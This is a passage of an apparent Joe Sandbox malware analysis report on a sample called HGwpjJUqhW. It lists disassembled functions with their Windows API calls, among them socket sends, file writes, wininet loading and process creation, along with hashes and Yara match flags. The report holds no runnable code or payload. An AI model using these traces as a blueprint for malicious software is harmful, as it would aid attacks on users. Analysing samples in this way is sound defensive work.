                                                                                                                            • Opcode Fuzzy Hash: d9452dc1e97e3283f142f93d7338fc759c74253d04a5a7a497979716add5d0bd
                                                                                                                            • Instruction Fuzzy Hash: CE413979504B049FC724DF78D988AA7BBF8BB48300F65896EE85ECB344D734A4058F60
                                                                                                                            Function 02C34F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02C34F43
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02C34F58
                                                                                                                            • WSASetLastError.WS2_32(00002746), ref: 02C34F6A
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C34F71
                                                                                                                            • timeGetTime.WINMM ref: 02C34F9F
                                                                                                                            • timeGetTime.WINMM ref: 02C34FC7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C35005
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C35011
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C35018
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C3502B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1979691958-0
                                                                                                                            • Opcode ID: 8141fad481ab3dd1a016163c1db92ad8aaf34e9f5bc4ef627a8531c03f4f7083
                                                                                                                            • Instruction ID: 5a4d1984e6c62a6a5b1283ab94bd900380b1f1ae987692edd47b36f820f73044
                                                                                                                            • Opcode Fuzzy Hash: 8141fad481ab3dd1a016163c1db92ad8aaf34e9f5bc4ef627a8531c03f4f7083
                                                                                                                            • Instruction Fuzzy Hash: AA412235A002009FD731DF29D948B6AB7EAFF8C314F484E58E84ACB241E776E9408B81
                                                                                                                            Function 03624F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03624F63
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03624F78
                                                                                                                            • WSASetLastError.WS2_32(00002746), ref: 03624F8A
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 03624F91
                                                                                                                            • timeGetTime.WINMM ref: 03624FBF
                                                                                                                            • timeGetTime.WINMM ref: 03624FE7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03625025
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03625031
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 03625038
                                                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 0362504B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1979691958-0
                                                                                                                            • Opcode ID: 30ea54806ba0c9227c055d55a3f2d851c46f8d410a011330c6853569a702d970
                                                                                                                            • Instruction ID: 3ef3a4dab1e432e2110f60b2a83570367d8295d50decdf29f7eca2e6d0c9d6be
                                                                                                                            • Opcode Fuzzy Hash: 30ea54806ba0c9227c055d55a3f2d851c46f8d410a011330c6853569a702d970
                                                                                                                            • Instruction Fuzzy Hash: 8B410735600B008FC731DF6ADA44A6ABBE9FF84710F194999E94AC7745E735E4408F40
                                                                                                                            Function 0362C270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362C2AE
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0362C2CC
                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0362C309
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362C314
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0362C321
                                                                                                                            • wsprintfW.USER32 ref: 0362C345
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                            • String ID: %s %s
                                                                                                                            • API String ID: 1326869720-2939940506
                                                                                                                            • Opcode ID: 04b6194f212b9bb20caa692b2faffe3d943284089c93164372590ee29960dbbb
                                                                                                                            • Instruction ID: 86d9e43f48487243192f6df17c31b0d887b4f4d49d1bef5069abdf7af8adc167
                                                                                                                            • Opcode Fuzzy Hash: 04b6194f212b9bb20caa692b2faffe3d943284089c93164372590ee29960dbbb
                                                                                                                            • Instruction Fuzzy Hash: 1A31F536A00628ABDB24EB64DC84FEF777CFB05310F400699B606EB184DB305A44CFA4
                                                                                                                            Function 0362C980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0362C98D
                                                                                                                            • _wcsrchr.LIBCMT ref: 0362C9C7
                                                                                                                              • Part of subcall function 03627C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03627CC3
                                                                                                                              • Part of subcall function 03627C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03627CD7
                                                                                                                              • Part of subcall function 03627C80: FreeLibrary.KERNEL32(00000000), ref: 03627CF7
                                                                                                                            • GetFileAttributesW.KERNEL32(-00000002), ref: 0362C9E6
                                                                                                                            • GetLastError.KERNEL32 ref: 0362C9F1
                                                                                                                            • _memset.LIBCMT ref: 0362CA04
                                                                                                                            • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0362CA31
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                            • String ID: D$WinSta0\Default
                                                                                                                            • API String ID: 174883095-1101385590
                                                                                                                            • Opcode ID: 43f59136a448a64c8cd8eddfba25e9fc2526ac52396db990730d7a840ae00025
                                                                                                                            • Instruction ID: c4b22cfec89a305b447ccc5a16f0ceb43c3546a8207943b86b678624a9d86fd3
                                                                                                                            • Opcode Fuzzy Hash: 43f59136a448a64c8cd8eddfba25e9fc2526ac52396db990730d7a840ae00025
                                                                                                                            • Instruction Fuzzy Hash: D0115BB6D0061827D720E6B49C45FBFBF6C9B41710F050129FA069E2C4EB75D505CAA5
                                                                                                                            Function 03628159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 03628166
                                                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 03628176
                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 036281A6
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 036281B7
                                                                                                                            • __wcsnicmp.LIBCMT ref: 036281CE
                                                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 03628204
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 03628228
                                                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 03628233
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                            • String ID: A:\$B:\
                                                                                                                            • API String ID: 4249875308-1009255891
                                                                                                                            • Opcode ID: 8f88d4db523ca3b0aaa3a72e37f8755ed9534fac24474f044e409b56d2d73a9f
                                                                                                                            • Instruction ID: 0fa5c20c457dde0dbfe2b9b3c315d1d87a9c0277d1de55c094b1613357c1d144
                                                                                                                            • Opcode Fuzzy Hash: 8f88d4db523ca3b0aaa3a72e37f8755ed9534fac24474f044e409b56d2d73a9f
                                                                                                                            • Instruction Fuzzy Hash: E8118135A01629DBDB20EF50DD547EEBB78EF44200F054498EE0AA7244E770EA05CF95
                                                                                                                            Function 03629730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,95401134,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E,00000000), ref: 03629773
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0362E1AE,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629812
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629850
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629875
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 0362989A
                                                                                                                              • Part of subcall function 03621280: __CxxThrowException@8.LIBCMT ref: 03621290
                                                                                                                              • Part of subcall function 03621280: DeleteCriticalSection.KERNEL32(00000000,0362D3E6,03646624,?,?,0362D3E6,?,?,?,?,03645A40,00000000), ref: 036212A1
                                                                                                                              • Part of subcall function 0362CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0362E076,00000000,95401134,0362E04E,74DF2F60,00000000,?,0362E226,0364110B,000000FF,?,0362994A,0362E226), ref: 0362CE67
                                                                                                                              • Part of subcall function 0362CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0362E08E,00000000,?,0362E226,0364110B,000000FF,?,0362994A,0362E226,?,?,?,00000000,0364125B,000000FF), ref: 0362CE83
                                                                                                                            • InterlockedExchange.KERNEL32(0362E066,00000000), ref: 036299A0
                                                                                                                            • timeGetTime.WINMM(?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 036299A6
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 036299B4
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 036299BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1400036169-0
                                                                                                                            • Opcode ID: e6e5aa30610438c5fbca0467e54959df07f7ecac5d647bcc306c58a70d0d7c0f
                                                                                                                            • Instruction ID: 6c8e6ac08e8dc780fa455585c6c20df4d246977a77ddaa03da2645988585279d
                                                                                                                            • Opcode Fuzzy Hash: e6e5aa30610438c5fbca0467e54959df07f7ecac5d647bcc306c58a70d0d7c0f
                                                                                                                            • Instruction Fuzzy Hash: 8A81E3B0A01A56BFE344DF7A888479AFBA8FB09344F51462EE12CC7640D775A960CF94
                                                                                                                            Function 02C33500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C33660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C33667
                                                                                                                              • Part of subcall function 02C33660: _free.LIBCMT ref: 02C3369C
                                                                                                                              • Part of subcall function 02C33660: _malloc.LIBCMT ref: 02C336D7
                                                                                                                              • Part of subcall function 02C33660: _memset.LIBCMT ref: 02C336E5
                                                                                                                            • InterlockedIncrement.KERNEL32(02C4D990), ref: 02C33565
                                                                                                                            • InterlockedIncrement.KERNEL32(02C4D990), ref: 02C33573
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02C3359A
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02C335B3
                                                                                                                            • ResetEvent.KERNEL32(?,?,?,02C4D990), ref: 02C335EE
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C33621
                                                                                                                            • GetLastError.KERNEL32 ref: 02C33639
                                                                                                                              • Part of subcall function 02C33F60: GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                              • Part of subcall function 02C33F60: send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                              • Part of subcall function 02C33F60: SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                              • Part of subcall function 02C33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                              • Part of subcall function 02C33F60: WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                              • Part of subcall function 02C33F60: shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                              • Part of subcall function 02C33F60: closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C33649
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 127459856-0
                                                                                                                            • Opcode ID: a8f8602c3a2ba22fb6efec3fa1755762a1af584bfe1a76789ded7c9b2aa230f2
                                                                                                                            • Instruction ID: 85b5e297d9abfa1a07196e7008bd0fbc56e286a2a10f7917ed4df0e0cc3bb429
                                                                                                                            • Opcode Fuzzy Hash: a8f8602c3a2ba22fb6efec3fa1755762a1af584bfe1a76789ded7c9b2aa230f2
                                                                                                                            • Instruction Fuzzy Hash: 59419CB5A40704AFD360EF69DC81B6BB7E8BB48710F50096EE646D7680DBB5F5048B90
                                                                                                                            Function 03623500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03623660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03623667
                                                                                                                              • Part of subcall function 03623660: _free.LIBCMT ref: 0362369C
                                                                                                                              • Part of subcall function 03623660: _malloc.LIBCMT ref: 036236D7
                                                                                                                              • Part of subcall function 03623660: _memset.LIBCMT ref: 036236E5
                                                                                                                            • InterlockedIncrement.KERNEL32(03651F0C), ref: 03623565
                                                                                                                            • InterlockedIncrement.KERNEL32(03651F0C), ref: 03623573
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0362359A
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 036235B3
                                                                                                                            • ResetEvent.KERNEL32(?,?,?,03651F0C), ref: 036235EE
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 03623621
                                                                                                                            • GetLastError.KERNEL32 ref: 03623639
                                                                                                                              • Part of subcall function 03623F60: GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                              • Part of subcall function 03623F60: send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                              • Part of subcall function 03623F60: SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                              • Part of subcall function 03623F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                              • Part of subcall function 03623F60: WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                              • Part of subcall function 03623F60: shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                              • Part of subcall function 03623F60: closesocket.WS2_32(?), ref: 03624025
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 03623649
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 127459856-0
                                                                                                                            • Opcode ID: 7c94d20fa4ad5d667eb2bc5d27a790655f3e99c5a3d3f7998c22419b7a253a0d
                                                                                                                            • Instruction ID: a40e8a24227d6003314f6fb4a1656e21fb96ea4ae09de47964e9179fd1237e62
                                                                                                                            • Opcode Fuzzy Hash: 7c94d20fa4ad5d667eb2bc5d27a790655f3e99c5a3d3f7998c22419b7a253a0d
                                                                                                                            • Instruction Fuzzy Hash: 1E41B3B9600B149FD360EF69DD80B6ABBE8FB48701F21482EEA4AD7740D7B5E4048F50
                                                                                                                            Function 02C34430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C34443
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C3444C
                                                                                                                            • timeGetTime.WINMM ref: 02C3444E
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C3445D
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 02C344AB
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C344C8
                                                                                                                              • Part of subcall function 02C33F60: GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                              • Part of subcall function 02C33F60: send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                              • Part of subcall function 02C33F60: SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                              • Part of subcall function 02C33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                              • Part of subcall function 02C33F60: WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                              • Part of subcall function 02C33F60: shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                              • Part of subcall function 02C33F60: closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C344DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542259498-0
                                                                                                                            • Opcode ID: c05e442b2703ae367a8fd7147fd0da7a0a893dae7fa68a100fe5a8bf000204cc
                                                                                                                            • Instruction ID: 15215534c3fb692893870d989c6b264c18b7877c008f282b20ebfba599384c8e
                                                                                                                            • Opcode Fuzzy Hash: c05e442b2703ae367a8fd7147fd0da7a0a893dae7fa68a100fe5a8bf000204cc
                                                                                                                            • Instruction Fuzzy Hash: A7216F76640704ABC634EF69EC84B97B3E8FF99720F500E1EF58AC7640D671B4048BA0
                                                                                                                            Function 03624430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 03624443
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 0362444C
                                                                                                                            • timeGetTime.WINMM ref: 0362444E
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0362445D
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 036244AB
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 036244C8
                                                                                                                              • Part of subcall function 03623F60: GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                              • Part of subcall function 03623F60: send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                              • Part of subcall function 03623F60: SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                              • Part of subcall function 03623F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                              • Part of subcall function 03623F60: WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                              • Part of subcall function 03623F60: shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                              • Part of subcall function 03623F60: closesocket.WS2_32(?), ref: 03624025
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 036244DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542259498-0
                                                                                                                            • Opcode ID: b6dce9663483e8665da85c1314b71c8fc89d0bb43cc20adb41790a9285768320
                                                                                                                            • Instruction ID: 20b40af7ca1cfd676934210c72ff6e4a877a470a5770459cd24bbb916d50e4f0
                                                                                                                            • Opcode Fuzzy Hash: b6dce9663483e8665da85c1314b71c8fc89d0bb43cc20adb41790a9285768320
                                                                                                                            • Instruction Fuzzy Hash: 60215276600B149BC320EF79DD84A97B7E8EF89710F114A1EF699C7644DA71E4008BA4
                                                                                                                            Function 02C34E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 02C34E79
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 02C34E98
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 02C34EA2
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 02C34EB9
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 02C34EC2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 02C34EC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: 314f79f92304ef80437e57bd61486e74249382bd69447459754f90288d717416
                                                                                                                            • Instruction ID: 224d918507615b9474bc4db9693c788d86c0736ca367eec4f2a2283cc7777ba2
                                                                                                                            • Opcode Fuzzy Hash: 314f79f92304ef80437e57bd61486e74249382bd69447459754f90288d717416
                                                                                                                            • Instruction Fuzzy Hash: AD1186367043048BC731EA79EC84A6BF3DCEB98765B400E2AE645C6540D771E914CBE5
                                                                                                                            Function 03624E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 03624E99
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 03624EB8
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 03624EC2
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 03624ED9
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03624EE2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03624EE9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
